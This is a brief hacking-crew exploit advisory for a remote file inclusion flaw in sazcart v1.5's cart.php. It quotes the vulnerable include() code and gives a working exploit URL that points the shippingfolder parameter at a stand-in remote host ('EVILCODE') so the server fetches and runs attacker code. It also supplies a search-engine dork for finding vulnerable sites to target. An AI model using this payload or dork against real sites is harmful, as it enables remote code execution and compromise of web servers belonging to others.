sazcart v1.5 (cart.php) Remote File include ***---Hitamputih crew---***** * Bug Found By : IbnuSina * vendor : http://sazcart.com/site Risk : High * Greetz : Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid * and all member hitamputih crew community www.kaipank.org/forum especially thx to email@example.com ************* bug found on admin/controls/cart.php include($_saz['settings']['shippingfolder'] . "/shipping.php"); $Shipping = new Shipping; include($_saz['settings']['taxfolder'] . "/tax.php"); $Tax = new Tax;
exploit : http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE? google dork: "powered by sazcart"